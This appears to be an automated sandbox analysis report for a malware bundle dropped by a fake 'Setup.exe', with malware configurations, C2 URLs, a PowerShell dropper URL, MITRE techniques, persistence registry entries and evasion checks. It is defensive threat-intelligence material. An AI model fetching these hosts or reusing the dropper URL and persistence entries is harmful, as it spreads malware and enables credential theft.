amadey | 8bd004298abd06e9e01067f14ca55f5d5cc899c37fc03c7b0cc3eb6702c84437

Resubmissions

19-10-2021 08:05

211019-jyy3zsgcem 10

18-10-2021 18:38

211018-w97wgsecc3 10

Analysis

max time kernel
251s
max time network
1807s
platform
windows10_x64
resource
win10-de-20211014
submitted
19-10-2021 08:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

425KB
MD5

93d44fa2ceefa5dab55b3b4d89c5c3de
SHA1

5af7a4e78c39b15e8d94a6c8ea247c96734ecca5
SHA256

8bd004298abd06e9e01067f14ca55f5d5cc899c37fc03c7b0cc3eb6702c84437
SHA512

b481bbf8551a9d56e8161b15661ab6c08f5d024f8ccb0e842d1d2db82f80a401dd8ed3892fa8a917dcddb198c91bd5eca678093ff1b263a2194d4cc47ec65977

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

redline

205.185.119.191:60857

Extracted

Family

vidar

Version

41.5

Botnet

937

https://mas.to/@xeroxxx

Attributes

profile_id
937

Extracted

Family

raccoon

Botnet

a7a7651f160522c3eb3c593186fb8a026774778c

Attributes

url4cnc
http://telegatt.top/kaba4ello
http://telegka.top/kaba4ello
http://telegin.top/kaba4ello
https://t.me/kaba4ello

rc4.plain

Extracted

Family

smokeloader

Version

2020

http://gejajoo7.top/

http://sysaheu9.top/

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

http://gfdjgdfjgdhfbg.space/

http://gfhjdsghdfjg23.space/

http://gdfjgdfh4543nf.space/

http://fgdjgsdfghj4fds.space/

http://fgdgdjfgfdgdf.space/

http://fsdhjfsdhfsd.space/

http://fgdsjghdfghjdfhgd.space/

http://ryuesrseyth3.space/

http://fdsjkuhreyu4.space/

http://fdgjdfgehr4.space/

http://fgdgjhdfgdfjgd.space/

rc4.i32

Extracted

Family

tofsee

quadoil.ru

lakeflex.ru

Extracted

Family

djvu

http://rlrz.org/lancer

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral7/memory/2316-248-0x0000000004A80000-0x0000000004A9F000-memory.dmp	family_redline
behavioral7/memory/2316-252-0x0000000004F90000-0x0000000004FAD000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\dNR9GzJtquIpqHAAQDEQKiCc.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\dNR9GzJtquIpqHAAQDEQKiCc.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 4340 created 1996	4340	WerFault.exe	P6IM15FYTnFWYGYBlTaNAQNV.exe
PID 1680 created 3260	1680	WerFault.exe	ZYTTZvTjfNQKR2odpduE7e6V.exe
PID 4976 created 4632	4976	WerFault.exe	Xe69stRPhDXfGhprTq2CAk6x.exe
PID 2992 created 1500	2992	WerFault.exe	V58wsCmspK2T1T22TACWZJED.exe

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral7/memory/1428-230-0x0000000004D90000-0x0000000004E66000-memory.dmp	family_vidar
behavioral7/memory/1428-253-0x0000000000400000-0x0000000002F7E000-memory.dmp	family_vidar

Blocklisted process makes network request 8 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	process
137	1764	powershell.exe
155	1764	powershell.exe
165	1764	powershell.exe
180	1764	powershell.exe
215	1764	powershell.exe
218	1764	powershell.exe
358	5540	powershell.exe
363	5540	powershell.exe

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 64 IoCs

Processes:

xeEw11gwst0fkXofh5d85wTx.exeov3fHpSzG9oFx6cdzkERxS7K.exeLrPNo0ksV0sD0bBgiJZ3c3DL.exel3igHLv4wrdFGbDIGj2a6ZlN.exeP6IM15FYTnFWYGYBlTaNAQNV.exe7wTOP5xOsIHTorBSiqyxCKfI.exeVHmeMVDoBYofuqGBZLun8iZf.exek8k8wxXjfUpeIXlPi_wwZUXx.exedNR9GzJtquIpqHAAQDEQKiCc.exehnIgIshcqBcfNW7qZq6J9Ibf.exeUNn8rF6JNcKGgeWhrAoHnhsK.exe3fcHdKzTfqv3CT6edHB3pgwO.exeZYTTZvTjfNQKR2odpduE7e6V.exeEFJdNYHjJ49sjLJwK4BnTbAE.exeAbR7TZXbBVNpeCrmegTpEi9c.exe8FsmloAVEPbzDjS_YK8iQVCC.executm3.exeDownFlSetup999.exeinst3.exeVHmeMVDoBYofuqGBZLun8iZf.exepyflG5FfHzPj8pAPJ5WotMgv.exe8pWB.eXEextd.exeKk7BKQEt0gSMkeq6PwISSEHn.exeHIJpnBDWwQL8HQX6heuOz6pE.exeextd.exeFZzLr2tjqX1Jir6RqytEFraR.exeV58wsCmspK2T1T22TACWZJED.exeXe69stRPhDXfGhprTq2CAk6x.exeextd.exeyJF_LsprLnKYzCsvUDnA8T0K.exesvchost.exesetup.exesetup.exe814D.exe11.exeexplorer.exeA792.exe814D.exetaskkill.exe39E.exedihfvbkz.exeCalculator.exeCalculator.exeCalculator.exe46A4.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exesihost64.exeA2EE.exewfuddhtcmd.exesqtvvs.exe

pid	process
1576	xeEw11gwst0fkXofh5d85wTx.exe
372	ov3fHpSzG9oFx6cdzkERxS7K.exe
1268	LrPNo0ksV0sD0bBgiJZ3c3DL.exe
1664	l3igHLv4wrdFGbDIGj2a6ZlN.exe
1996	P6IM15FYTnFWYGYBlTaNAQNV.exe
1428	7wTOP5xOsIHTorBSiqyxCKfI.exe
1608	VHmeMVDoBYofuqGBZLun8iZf.exe
2000	k8k8wxXjfUpeIXlPi_wwZUXx.exe
1764	dNR9GzJtquIpqHAAQDEQKiCc.exe
1808	hnIgIshcqBcfNW7qZq6J9Ibf.exe
1868	UNn8rF6JNcKGgeWhrAoHnhsK.exe
3060	3fcHdKzTfqv3CT6edHB3pgwO.exe
3260	ZYTTZvTjfNQKR2odpduE7e6V.exe
2316	EFJdNYHjJ49sjLJwK4BnTbAE.exe
1876	AbR7TZXbBVNpeCrmegTpEi9c.exe
864	8FsmloAVEPbzDjS_YK8iQVCC.exe
2188	cutm3.exe
3604	DownFlSetup999.exe
2244	inst3.exe
4144	VHmeMVDoBYofuqGBZLun8iZf.exe
4220	pyflG5FfHzPj8pAPJ5WotMgv.exe
4360	8pWB.eXE
4376	extd.exe
4800	Kk7BKQEt0gSMkeq6PwISSEHn.exe
4344	HIJpnBDWwQL8HQX6heuOz6pE.exe
3552	extd.exe
4516	FZzLr2tjqX1Jir6RqytEFraR.exe
1500	V58wsCmspK2T1T22TACWZJED.exe
4632	Xe69stRPhDXfGhprTq2CAk6x.exe
3088	extd.exe
4436	yJF_LsprLnKYzCsvUDnA8T0K.exe
3068	svchost.exe
4500	setup.exe
2032	setup.exe
3088	extd.exe
196	814D.exe
4224	11.exe
4536	explorer.exe
2328	A792.exe
4420	814D.exe
3328	taskkill.exe
5148	39E.exe
5256	dihfvbkz.exe
5496	Calculator.exe
5720	Calculator.exe
5968	Calculator.exe
6016	46A4.exe
6076	Calculator.exe
6104	Calculator.exe
6132	Calculator.exe
5160	Calculator.exe
1144	Calculator.exe
5416	Calculator.exe
4844	Calculator.exe
5464	Calculator.exe
5476	Calculator.exe
5512	Calculator.exe
5572	Calculator.exe
5968	Calculator.exe
5956	sihost64.exe
6276	A2EE.exe
6384	wfuddht
6492	cmd.exe
6620	sqtvvs.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\4756.tmp\4757.tmp\extd.exe	upx

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exe39E.exeUNn8rF6JNcKGgeWhrAoHnhsK.exek8k8wxXjfUpeIXlPi_wwZUXx.exel3igHLv4wrdFGbDIGj2a6ZlN.exeCalculator.exe3fcHdKzTfqv3CT6edHB3pgwO.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	39E.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UNn8rF6JNcKGgeWhrAoHnhsK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	k8k8wxXjfUpeIXlPi_wwZUXx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	k8k8wxXjfUpeIXlPi_wwZUXx.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	l3igHLv4wrdFGbDIGj2a6ZlN.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	39E.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Calculator.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UNn8rF6JNcKGgeWhrAoHnhsK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3fcHdKzTfqv3CT6edHB3pgwO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Calculator.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3fcHdKzTfqv3CT6edHB3pgwO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	l3igHLv4wrdFGbDIGj2a6ZlN.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Calculator.exeCalculator.exeCalculator.exeSetup.exepyflG5FfHzPj8pAPJ5WotMgv.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	Calculator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	Calculator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	Calculator.exe
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	pyflG5FfHzPj8pAPJ5WotMgv.exe

Loads dropped DLL 64 IoCs

Processes:

Kk7BKQEt0gSMkeq6PwISSEHn.exe7wTOP5xOsIHTorBSiqyxCKfI.exeyJF_LsprLnKYzCsvUDnA8T0K.exemsiexec.exesetup.exesetup.exeCalculator.exeCalculator.execmd.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exe46A4.exeCalculator.exe

pid	process
4800	Kk7BKQEt0gSMkeq6PwISSEHn.exe
4800	Kk7BKQEt0gSMkeq6PwISSEHn.exe
4800	Kk7BKQEt0gSMkeq6PwISSEHn.exe
4800	Kk7BKQEt0gSMkeq6PwISSEHn.exe
1428	7wTOP5xOsIHTorBSiqyxCKfI.exe
1428	7wTOP5xOsIHTorBSiqyxCKfI.exe
4436	yJF_LsprLnKYzCsvUDnA8T0K.exe
4436	yJF_LsprLnKYzCsvUDnA8T0K.exe
4436	yJF_LsprLnKYzCsvUDnA8T0K.exe
4436	yJF_LsprLnKYzCsvUDnA8T0K.exe
4436	yJF_LsprLnKYzCsvUDnA8T0K.exe
4436	yJF_LsprLnKYzCsvUDnA8T0K.exe
4800
4800
4436	yJF_LsprLnKYzCsvUDnA8T0K.exe
4436	yJF_LsprLnKYzCsvUDnA8T0K.exe
3884	msiexec.exe
3884	msiexec.exe
4500	setup.exe
4500	setup.exe
2032	setup.exe
2032	setup.exe
4500	setup.exe
4500	setup.exe
4500	setup.exe
5496	Calculator.exe
5496	Calculator.exe
5496	Calculator.exe
4500	setup.exe
4800
2032	setup.exe
2032	setup.exe
5720	Calculator.exe
5720	Calculator.exe
5720	Calculator.exe
2032	setup.exe
2032	setup.exe
4436	cmd.exe
6076	Calculator.exe
6104	Calculator.exe
6132	Calculator.exe
5160	Calculator.exe
1144	Calculator.exe
5416	Calculator.exe
5416	Calculator.exe
1144	Calculator.exe
5416	Calculator.exe
1144	Calculator.exe
5476	Calculator.exe
5476	Calculator.exe
5476	Calculator.exe
5512	Calculator.exe
5512	Calculator.exe
5512	Calculator.exe
1144	Calculator.exe
5512	Calculator.exe
5572	Calculator.exe
5572	Calculator.exe
5572	Calculator.exe
5572	Calculator.exe
6016	46A4.exe
5968	Calculator.exe
5968	Calculator.exe
5968	Calculator.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

6928 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
6928	icacls.exe

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\3fcHdKzTfqv3CT6edHB3pgwO.exe	themida
C:\Users\Admin\Pictures\Adobe Films\k8k8wxXjfUpeIXlPi_wwZUXx.exe	themida
C:\Users\Admin\Pictures\Adobe Films\l3igHLv4wrdFGbDIGj2a6ZlN.exe	themida
C:\Users\Admin\Pictures\Adobe Films\l3igHLv4wrdFGbDIGj2a6ZlN.exe	themida
C:\Users\Admin\Pictures\Adobe Films\k8k8wxXjfUpeIXlPi_wwZUXx.exe	themida
C:\Users\Admin\Pictures\Adobe Films\3fcHdKzTfqv3CT6edHB3pgwO.exe	themida
behavioral7/memory/2000-198-0x00000000013C0000-0x00000000013C1000-memory.dmp	themida
behavioral7/memory/3060-197-0x0000000000BC0000-0x0000000000BC1000-memory.dmp	themida
behavioral7/memory/1664-196-0x0000000000C00000-0x0000000000C01000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

A792.exesetup.exesetup.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\oylmwypf = "\"C:\\Users\\Admin\\dihfvbkz.exe\""	A792.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --XpjC5"	setup.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --XpjC5"	setup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 7 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

UNn8rF6JNcKGgeWhrAoHnhsK.exek8k8wxXjfUpeIXlPi_wwZUXx.exe3fcHdKzTfqv3CT6edHB3pgwO.exel3igHLv4wrdFGbDIGj2a6ZlN.exesvchost.exe39E.exeCalculator.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UNn8rF6JNcKGgeWhrAoHnhsK.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	k8k8wxXjfUpeIXlPi_wwZUXx.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3fcHdKzTfqv3CT6edHB3pgwO.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	l3igHLv4wrdFGbDIGj2a6ZlN.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	svchost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	39E.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Calculator.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 12 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
5657	api.2ip.ua
19	ipinfo.io
20	ipinfo.io
159	ipinfo.io
160	ipinfo.io
1509	api.2ip.ua
5726	api.2ip.ua
118	ipinfo.io
119	ipinfo.io
121	ip-api.com
1294	api.2ip.ua
1295	api.2ip.ua

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

k8k8wxXjfUpeIXlPi_wwZUXx.exe3fcHdKzTfqv3CT6edHB3pgwO.exel3igHLv4wrdFGbDIGj2a6ZlN.exe39E.exeCalculator.exe

pid process

2000 k8k8wxXjfUpeIXlPi_wwZUXx.exe
3060 3fcHdKzTfqv3CT6edHB3pgwO.exe
1664 l3igHLv4wrdFGbDIGj2a6ZlN.exe
5148 39E.exe
5968 Calculator.exe

pid	process
2000	k8k8wxXjfUpeIXlPi_wwZUXx.exe
3060	3fcHdKzTfqv3CT6edHB3pgwO.exe
1664	l3igHLv4wrdFGbDIGj2a6ZlN.exe
5148	39E.exe
5968	Calculator.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

VHmeMVDoBYofuqGBZLun8iZf.exe814D.exe

description	pid	process	target process
PID 1608 set thread context of 4144	1608	VHmeMVDoBYofuqGBZLun8iZf.exe	VHmeMVDoBYofuqGBZLun8iZf.exe
PID 196 set thread context of 4420	196	814D.exe	814D.exe

Drops file in Program Files directory 7 IoCs

Processes:

AbR7TZXbBVNpeCrmegTpEi9c.exeLrPNo0ksV0sD0bBgiJZ3c3DL.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	AbR7TZXbBVNpeCrmegTpEi9c.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe	AbR7TZXbBVNpeCrmegTpEi9c.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst3.exe	AbR7TZXbBVNpeCrmegTpEi9c.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	AbR7TZXbBVNpeCrmegTpEi9c.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	AbR7TZXbBVNpeCrmegTpEi9c.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	LrPNo0ksV0sD0bBgiJZ3c3DL.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	LrPNo0ksV0sD0bBgiJZ3c3DL.exe

Drops file in Windows directory 4 IoCs

Processes:

UNn8rF6JNcKGgeWhrAoHnhsK.exesvchost.exe

description	ioc	process
File created	C:\Windows\System\svchost.exe	UNn8rF6JNcKGgeWhrAoHnhsK.exe
File opened for modification	C:\Windows\System\svchost.exe	UNn8rF6JNcKGgeWhrAoHnhsK.exe
File created	C:\Windows\System\xxx1.bak	svchost.exe
File created	C:\Windows\System\xxx1.bak	UNn8rF6JNcKGgeWhrAoHnhsK.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4260	1996	WerFault.exe	P6IM15FYTnFWYGYBlTaNAQNV.exe
4636	1996	WerFault.exe	P6IM15FYTnFWYGYBlTaNAQNV.exe
5028	1996	WerFault.exe	P6IM15FYTnFWYGYBlTaNAQNV.exe
4108	1996	WerFault.exe	P6IM15FYTnFWYGYBlTaNAQNV.exe
4340	1996	WerFault.exe	P6IM15FYTnFWYGYBlTaNAQNV.exe
1680	3260	WerFault.exe	ZYTTZvTjfNQKR2odpduE7e6V.exe
4976	4632	WerFault.exe	Xe69stRPhDXfGhprTq2CAk6x.exe
2992	1500	WerFault.exe	V58wsCmspK2T1T22TACWZJED.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\Kk7BKQEt0gSMkeq6PwISSEHn.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\Kk7BKQEt0gSMkeq6PwISSEHn.exe	nsis_installer_2
C:\Users\Admin\Pictures\Adobe Films\Kk7BKQEt0gSMkeq6PwISSEHn.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\Kk7BKQEt0gSMkeq6PwISSEHn.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 15 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

FZzLr2tjqX1Jir6RqytEFraR.exeCalculator.exe814D.exe46A4.exeVHmeMVDoBYofuqGBZLun8iZf.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	FZzLr2tjqX1Jir6RqytEFraR.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Calculator.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	814D.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	FZzLr2tjqX1Jir6RqytEFraR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	814D.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Calculator.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	46A4.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	VHmeMVDoBYofuqGBZLun8iZf.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	814D.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	FZzLr2tjqX1Jir6RqytEFraR.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Calculator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	46A4.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	46A4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	VHmeMVDoBYofuqGBZLun8iZf.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	VHmeMVDoBYofuqGBZLun8iZf.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

7wTOP5xOsIHTorBSiqyxCKfI.exeA2EE.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7wTOP5xOsIHTorBSiqyxCKfI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7wTOP5xOsIHTorBSiqyxCKfI.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	A2EE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	A2EE.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4248 schtasks.exe
2628 schtasks.exe
6824 schtasks.exe
4408 schtasks.exe
6232 schtasks.exe
7100 schtasks.exe
4300 schtasks.exe
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

5324 timeout.exe
4020 timeout.exe
6668 timeout.exe
6404 timeout.exe
Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

6764 taskkill.exe
3328 taskkill.exe
6896 taskkill.exe
6724 taskkill.exe
4624 taskkill.exe
3744 taskkill.exe
1208 taskkill.exe
6564 taskkill.exe

pid	process
4248	schtasks.exe
2628	schtasks.exe
6824	schtasks.exe
4408	schtasks.exe
6232	schtasks.exe
7100	schtasks.exe
4300	schtasks.exe

pid	process
5324	timeout.exe
4020	timeout.exe
6668	timeout.exe
6404	timeout.exe

pid	process
6764	taskkill.exe
3328	taskkill.exe
6896	taskkill.exe
6724	taskkill.exe
4624	taskkill.exe
3744	taskkill.exe
1208	taskkill.exe
6564	taskkill.exe

Modifies registry class 3 IoCs

Processes:

description	ioc	process
